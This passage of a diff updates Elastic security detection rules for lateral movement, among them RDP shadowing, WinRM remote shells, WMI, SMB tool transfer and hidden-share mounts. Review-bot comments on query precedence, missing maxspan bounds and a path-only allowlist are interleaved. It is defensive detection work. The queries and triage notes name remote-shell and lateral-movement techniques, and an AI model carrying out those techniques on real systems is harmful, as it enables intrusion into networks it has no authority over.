malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions 
\u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where event.type == \"start\" and process.pid != 4]\n [network where destination.port == 445 and process.pid != 4 and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], "risk_score": 47, "rule_id": "c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1", "severity": "medium", @@ -48,5 +76,5 @@ } ], "type": "eql", - "version": 7 + "version": 9 } 
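Review bot: The query line `sequence by process.entity_id [process where event.type == "start" and process.pid != 4] [network where destination.port == 445 ...]` carries no `with maxspan`, unlike the other sequence rules in this change (lateral_movement_cmd_service.json and lateral_movement_dcom_hta.json both bound the pair at `maxspan = 1m`). The first stage matches essentially every process start on the host, so without a bound the engine presumably has to retain each of them until a port-445 connection by the same entity arrives or the state is evicted, and a connection hours after the start still pairs with it. If that unbounded pairing is intentional it deserves a one-line comment in the query string; otherwise `sequence by process.entity_id with maxspan=5m` is worth considering, and the new triage note's "established by the kernel (PID 4)" framing would still hold.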
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dns_server_overflow.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dns_server_overflow.json index 48b2151176b1e..eb8a008602cb8 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dns_server_overflow.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dns_server_overflow.json @@ -20,6 +20,38 @@ "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", "https://github.com/maxpl0it/CVE-2020-1350-DoS" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.bytes", + "type": "long" + }, + { + "ecs": false, + "name": "type", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "11013227-0301-4a8c-b150-4db924484475", "severity": "medium", @@ -48,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_evasion_rdp_shadowing.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_evasion_rdp_shadowing.json index 4787ab253a04a..8fcea678e6bc2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_evasion_rdp_shadowing.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_evasion_rdp_shadowing.json 
@@ -12,14 +12,47 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Remote Desktop Shadowing Activity", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "/* Identifies the modification of RDP Shadow registry or\n the execution of processes indicative of active shadow RDP session */\n\nany where \n (event.category == \"registry\" and\n registry.path : \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\Shadow\"\n ) or\n (event.category == \"process\" and \n (process.name : (\"RdpSaUacHelper.exe\", \"RdpSaProxy.exe\") and process.parent.name : \"svchost.exe\") or\n (process.pe.original_file_name : \"mstsc.exe\" and process.args : \"/shadow:*\")\n )\n", + "note": "", + "query": "/* Identifies the modification of RDP Shadow registry or\n the execution of processes indicative of active shadow RDP session */\n\nany where\n (event.category == \"registry\" and\n registry.path : \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\Shadow\"\n ) or\n (event.category == \"process\" and\n (process.name : (\"RdpSaUacHelper.exe\", \"RdpSaProxy.exe\") and process.parent.name : \"svchost.exe\") or\n (process.pe.original_file_name : \"mstsc.exe\" and process.args : \"/shadow:*\")\n )\n", "references": [ "https://bitsadm.in/blog/spying-on-users-using-rdp-shadowing", "https://swarm.ptsecurity.com/remote-desktop-services-shadowing/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "c57f8579-e2a5-4804-847f-f2732edc5156", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -47,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_executable_tool_transfer_smb.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_executable_tool_transfer_smb.json index a6297dba18540..05efa4319e9e6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_executable_tool_transfer_smb.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_executable_tool_transfer_smb.json 
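Review bot: In the new `"query"` line the process branch reads `(event.category == "process" and (process.name ... ) or (process.pe.original_file_name : "mstsc.exe" and process.args : "/shadow:*"))`; with `and` binding tighter than `or`, the `mstsc.exe` clause is not gated by `event.category == "process"`, so the grouping does not express what the comment above the query says it detects. In practice this is likely harmless because `process.pe.original_file_name` and `process.args` are only populated on process events, but the intent would be unambiguous as `(event.category == "process" and ((process.name : ("RdpSaUacHelper.exe", "RdpSaProxy.exe") and process.parent.name : "svchost.exe") or (process.pe.original_file_name : "mstsc.exe" and process.args : "/shadow:*")))`. Since this commit already rewrites that line (whitespace only), it is a cheap place to fix the precedence; the same shape should be checked in the other EQL rules touched by this change.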
@@ -14,6 +14,53 @@ "name": "Potential Lateral Tool Transfer via SMB Share", "note": "## Triage and analysis\n\n### Investigating Potential Lateral Tool Transfer via SMB Share\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools\ncan include discovery utilities, credential dumpers, malware, etc. Attackers can also leverage file shares that employees\nfrequently access to host malicious files to gain a foothold in other machines.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the created file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. 
Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence by host.id with maxspan=30s\n [network where event.type == \"start\" and process.pid == 4 and destination.port == 445 and\n network.direction : (\"incoming\", \"ingress\") and\n network.transport == \"tcp\" and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n /* add more executable extensions here if they are not noisy in your environment */\n [file where event.type in (\"creation\", \"change\") and process.pid == 4 and file.extension : (\"exe\", \"dll\", \"bat\", \"cmd\")] by process.entity_id\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], "risk_score": 47, "rule_id": "58bc134c-e8d2-4291-a552-b4b3e537c60b", "severity": "medium", @@ -54,5 +101,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_from_tsclient_mup.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_from_tsclient_mup.json index ae2561a0b5cd4..ebfbcee0db4aa 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_from_tsclient_mup.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_from_tsclient_mup.json 
@@ -12,13 +12,26 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Execution via TSClient Mountpoint",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type in (\"start\", \"process_started\") and process.executable : \"\\\\Device\\\\Mup\\\\tsclient\\\\*.exe\"\n",
 "references": [
 "https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -46,5 +59,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_via_file_shares_sequence.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_via_file_shares_sequence.json
index 5ae7aa4063a67..410a717430f11 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_via_file_shares_sequence.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_via_file_shares_sequence.json @@ -16,6 +16,38 @@ "references": [ "https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], "risk_score": 47, "rule_id": "ab75c24b-2502-43a0-bf7c-e60e662c811e", "severity": "medium", @@ -51,5 +83,5 @@ } ], "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_winrm_shell_execution.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_winrm_shell_execution.json index 1599836d7b7b0..db8ec87c7c65b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_winrm_shell_execution.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_winrm_shell_execution.json 
@@ -16,6 +16,53 @@ "license": "Elastic License v2", "name": "Incoming Execution via WinRM Remote Shell", "query": "sequence by host.id with maxspan=30s\n [network where process.pid == 4 and network.direction : (\"incoming\", \"ingress\") and\n destination.port in (5985, 5986) and network.protocol == \"http\" and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [process where event.type == \"start\" and process.parent.name : \"winrshost.exe\" and not process.name : \"conhost.exe\"]\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], "risk_score": 47, "rule_id": "1cd01db9-be24-4bef-8e7c-e923f0ff78ab", "severity": "medium", @@ -44,5 +91,5 @@ } ], "type": "eql", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_wmi.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_wmi.json index 2430477e7df28..d5015b708a136 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_wmi.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_wmi.json 
@@ -13,6 +13,53 @@ "license": "Elastic License v2", "name": "WMI Incoming Lateral Movement", "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where event.type in (\"start\", \"process_started\") and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\", \n \"C:\\\\windows\\\\TEMP\\\\nessus_*.TMP\", \n \"C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\", \n \"C:\\\\Windows\\\\CCMCache\\\\*\", \n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], "risk_score": 47, "rule_id": "f3475224-b179-4f78-8877-c2bd64c26b88", "severity": "medium", @@ -50,5 +97,5 @@ } ], "type": "eql", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_onedrive.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_onedrive.json index 37f2066e7b9b4..8a49ea25858fe 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_onedrive.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_onedrive.json @@ -14,13 +14,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "OneDrive Malware File Upload", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", "references": [ "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -49,5 +78,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_sharepoint.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_sharepoint.json index 4a114e592b260..5f5ff52d73d60 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_sharepoint.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_sharepoint.json @@ -14,13 +14,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "SharePoint Malware File Upload", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", "references": [ "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "0e52157a-8e96-4a95-a6e3-5faae5081a74", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -49,5 +78,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mount_hidden_or_webdav_share_net.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mount_hidden_or_webdav_share_net.json index e09b06bd42387..cd4d905d2367b 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mount_hidden_or_webdav_share_net.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mount_hidden_or_webdav_share_net.json
@@ -12,10 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Mounting Hidden or WebDav Remote Shares", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n ((process.name : \"net.exe\" or process.pe.original_file_name == \"net.exe\") or ((process.name : \"net1.exe\" or process.pe.original_file_name == \"net1.exe\") and\n not process.parent.name : \"net.exe\")) and\n process.args : \"use\" and\n /* including hidden and webdav based online shares such as onedrive */\n process.args : (\"\\\\\\\\*\\\\*$*\", \"\\\\\\\\*@SSL\\\\*\", \"http*\") and\n /* excluding shares deletion operation */\n not process.args : \"/d*\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +78,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mounting_smb_share.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mounting_smb_share.json
index 44fc8cf6592b0..eb4f7cfd68048 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mounting_smb_share.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mounting_smb_share.json
@@ -11,14 +11,42 @@ "language": "eql", "license": "Elastic License v2", "name": "Attempt to Mount SMB Share via Command Line", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n (\n process.name : \"mount_smbfs\" or\n (process.name : \"open\" and process.args : \"smb://*\") or\n (process.name : \"mount\" and process.args : \"smbfs\") or\n (process.name : \"osascript\" and process.command_line : \"osascript*mount volume*smb://*\")\n )\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n (\n process.name : \"mount_smbfs\" or\n (process.name : \"open\" and process.args : \"smb://*\") or\n (process.name : \"mount\" and process.args : \"smbfs\") or\n (process.name : \"osascript\" and process.command_line : \"osascript*mount volume*smb://*\")\n ) and\n not process.parent.executable : \"/Applications/Google Drive.app/Contents/MacOS/Google Drive\"\n", "references": [ "https://www.freebsd.org/cgi/man.cgi?mount_smbfs", "https://ss64.com/osx/mount.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "661545b4-1a90-4f45-85ce-2ebd7c6a15d0", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules 
was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -53,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_powershell_remoting_target.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_powershell_remoting_target.json index 39999613b1b3f..be25ac1875fba 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_powershell_remoting_target.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_powershell_remoting_target.json @@ -19,6 +19,48 @@ "references": [ "https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], "risk_score": 47, "rule_id": "2772264c-6fb9-4d9d-9014-b416eed21254", "severity": "medium", @@ -47,5 +89,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } 
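Review bot: The exclusion added to the `"query"` line, `not process.parent.executable : "/Applications/Google Drive.app/Contents/MacOS/Google Drive"`, allowlists on the parent path alone, so any process whose parent binary happens to live at that path is dropped from the rule regardless of what that binary is. If the data source populates parent code-signature fields, pairing the path with `process.parent.code_signature.trusted == true` (or a subject-name check) would keep the false-positive reduction while narrowing the carve-out to the genuine Google Drive client; that field is not referenced in this hunk, so confirm it is available before adding it to `required_fields`. The `required_fields` entry for `process.parent.executable` does correctly track the new query term.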
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_enabled_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_enabled_registry.json
index a7f79d5f778bc..df314a441cd6d 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_enabled_registry.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_enabled_registry.json
@@ -12,10 +12,43 @@ "language": "eql", "license": "Elastic License v2", "name": "RDP Enabled via Registry", - "note": "## Triage and analysis\n\n### Investigating RDP Enabled via Registry\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other\ncomputers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access\nvictim servers, often using privileged accounts.\n\nThis rule detects modification of the fDenyTSConnections registry key to the value `0`, which specifies that remote\ndesktop connections are enabled. Attackers can abuse remote registry, use psexec, etc., to enable RDP and move laterally.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- This mechanism can 